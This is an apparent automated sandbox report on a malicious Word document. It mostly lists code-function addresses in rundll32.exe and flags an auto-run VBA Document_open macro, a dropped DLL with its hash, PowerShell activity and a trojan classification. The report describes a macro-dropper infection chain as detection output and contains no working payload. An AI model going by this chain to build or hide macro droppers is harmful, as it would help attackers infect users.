Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00714C27	8_2_00714C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071542D	8_2_0071542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00723C07	8_2_00723C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007204E1	8_2_007204E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007284D9	8_2_007284D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00725CDF	8_2_00725CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072B499	8_2_0072B499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071C485	8_2_0071C485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00726D34	8_2_00726D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071B5F1	8_2_0071B5F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072B5C0	8_2_0072B5C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00714DCA	8_2_00714DCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007185B3	8_2_007185B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007165BF	8_2_007165BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00727DA5	8_2_00727DA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00719DAD	8_2_00719DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00719DAE	8_2_00719DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071ED87	8_2_0071ED87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071C587	8_2_0071C587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00717D8A	8_2_00717D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071C652	8_2_0071C652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00721ED9	8_2_00721ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007116B2	8_2_007116B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00713E9E	8_2_00713E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00724689	8_2_00724689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0071577E	8_2_0071577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00727F6A	8_2_00727F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072A746	8_2_0072A746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0072D713	8_2_0072D713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00728F18	8_2_00728F18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00713F9F	8_2_00713F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019C014	9_2_0019C014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00188217	9_2_00188217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00193C07	9_2_00193C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018923C	9_2_0018923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019C83F	9_2_0019C83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019502C	9_2_0019502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018542D	9_2_0018542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019BC21	9_2_0019BC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00184C27	9_2_00184C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019D45C	9_2_0019D45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C652	9_2_0018C652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00189055	9_2_00189055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00193856	9_2_00193856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00188A60	9_2_00188A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018BC63	9_2_0018BC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019B499	9_2_0019B499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019D099	9_2_0019D099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00183E9E	9_2_00183E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00194689	9_2_00194689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019188F	9_2_0019188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C485	9_2_0018C485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001960B9	9_2_001960B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001910BB	9_2_001910BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001816B2	9_2_001816B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C0B6	9_2_0018C0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00191ED9	9_2_00191ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001984D9	9_2_001984D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00195CDF	9_2_00195CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00195AC3	9_2_00195AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001832C2	9_2_001832C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001972F1	9_2_001972F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001932F0	9_2_001932F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019D2EC	9_2_0019D2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001904E1	9_2_001904E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001910E5	9_2_001910E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00196AE4	9_2_00196AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00198F18	9_2_00198F18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019531E	9_2_0019531E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019D713	9_2_0019D713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019893D	9_2_0019893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00186134	9_2_00186134
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00196D34	9_2_00196D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00196934	9_2_00196934
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019E32D	9_2_0019E32D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00184152	9_2_00184152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00185155	9_2_00185155
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019C340	9_2_0019C340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019A746	9_2_0019A746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00186B79	9_2_00186B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018577E	9_2_0018577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019A972	9_2_0019A972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00197F6A	9_2_00197F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00182362	9_2_00182362
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019B998	9_2_0019B998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00181B9C	9_2_00181B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00183F9F	9_2_00183F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00187D8A	9_2_00187D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019E985	9_2_0019E985
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018ED87	9_2_0018ED87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C587	9_2_0018C587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001943BF	9_2_001943BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001865BF	9_2_001865BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001885B3	9_2_001885B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001873A8	9_2_001873A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00189DAD	9_2_00189DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00189DAE	9_2_00189DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018D1A3	9_2_0018D1A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00197DA5	9_2_00197DA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00197BDC	9_2_00197BDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00184DCA	9_2_00184DCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00180BCC	9_2_00180BCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018C9C0	9_2_0018C9C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0019B5C0	9_2_0019B5C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0018B5F1	9_2_0018B5F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BC83F	10_2_003BC83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A923C	10_2_003A923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B502C	10_2_003B502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A542D	10_2_003A542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BBC21	10_2_003BBC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A4C27	10_2_003A4C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A8217	10_2_003A8217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BC014	10_2_003BC014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B3C07	10_2_003B3C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003ABC63	10_2_003ABC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A8A60	10_2_003A8A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD45C	10_2_003BD45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC652	10_2_003AC652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B3856	10_2_003B3856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9055	10_2_003A9055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B10BB	10_2_003B10BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B60B9	10_2_003B60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A16B2	10_2_003A16B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC0B6	10_2_003AC0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB499	10_2_003BB499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD099	10_2_003BD099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A3E9E	10_2_003A3E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B4689	10_2_003B4689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B188F	10_2_003B188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC485	10_2_003AC485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B72F1	10_2_003B72F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B32F0	10_2_003B32F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD2EC	10_2_003BD2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B04E1	10_2_003B04E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B10E5	10_2_003B10E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6AE4	10_2_003B6AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B1ED9	10_2_003B1ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B84D9	10_2_003B84D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B5CDF	10_2_003B5CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B5AC3	10_2_003B5AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A32C2	10_2_003A32C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B893D	10_2_003B893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A6134	10_2_003A6134
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6D34	10_2_003B6D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6934	10_2_003B6934
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BE32D	10_2_003BE32D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B8F18	10_2_003B8F18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B531E	10_2_003B531E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD713	10_2_003BD713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A6B79	10_2_003A6B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A577E	10_2_003A577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BA972	10_2_003BA972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7F6A	10_2_003B7F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A2362	10_2_003A2362
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A4152	10_2_003A4152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A5155	10_2_003A5155
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BC340	10_2_003BC340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BA746	10_2_003BA746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B43BF	10_2_003B43BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A65BF	10_2_003A65BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A85B3	10_2_003A85B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A73A8	10_2_003A73A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9DAE	10_2_003A9DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9DAD	10_2_003A9DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AD1A3	10_2_003AD1A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7DA5	10_2_003B7DA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB998	10_2_003BB998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A3F9F	10_2_003A3F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A1B9C	10_2_003A1B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A7D8A	10_2_003A7D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AED87	10_2_003AED87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC587	10_2_003AC587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BE985	10_2_003BE985
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AB5F1	10_2_003AB5F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7BDC	10_2_003B7BDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A4DCA	10_2_003A4DCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A0BCC	10_2_003A0BCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC9C0	10_2_003AC9C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB5C0	10_2_003BB5C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EC83F	11_2_003EC83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D923C	11_2_003D923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D542D	11_2_003D542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E502C	11_2_003E502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D4C27	11_2_003D4C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EBC21	11_2_003EBC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EC014	11_2_003EC014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D8217	11_2_003D8217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E3C07	11_2_003E3C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D8A60	11_2_003D8A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DBC63	11_2_003DBC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED45C	11_2_003ED45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E3856	11_2_003E3856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D9055	11_2_003D9055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC652	11_2_003DC652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E10BB	11_2_003E10BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E60B9	11_2_003E60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC0B6	11_2_003DC0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D16B2	11_2_003D16B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D3E9E	11_2_003D3E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EB499	11_2_003EB499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED099	11_2_003ED099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E188F	11_2_003E188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E4689	11_2_003E4689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC485	11_2_003DC485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E32F0	11_2_003E32F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E72F1	11_2_003E72F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED2EC	11_2_003ED2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E6AE4	11_2_003E6AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E10E5	11_2_003E10E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E04E1	11_2_003E04E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E5CDF	11_2_003E5CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E1ED9	11_2_003E1ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E84D9	11_2_003E84D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E5AC3	11_2_003E5AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D32C2	11_2_003D32C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E893D	11_2_003E893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D6134	11_2_003D6134

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: ARCH_25_012021.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: ARCH_25_012021.doc

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F

PE file contains strange resources

Source: N49I.dll.5.dr

Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@28/8@1/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_002834DF CreateToolhelp32Snapshot,

16_2_002834DF

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$CH_25_012021.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp

Jump to behavior

Source: ARCH_25_012021.doc

OLE indicator, Word Document stream: true

Source: ARCH_25_012021.doc

OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ .3.......3.............0.......................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................P...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......................{.............}..v.....=......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j..... {...............{.............}..v....(>......0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......................{.............}..v.....J......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......b...............{.............}..v.....K......0.T.............8.b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............lx.j......................{.............}..v....(.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............lx.j..... {...............{.............}..v............0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.T.............XDb.....(.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j......................{.............}..v....@.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v....P.......0.T.............XDb.....$.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ................{.............}..v..... ......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P'......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....(................{.............}..v.....(......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P/......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....0................{.............}..v.....0......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P7......0.T.............................P...............	Jump to behavior
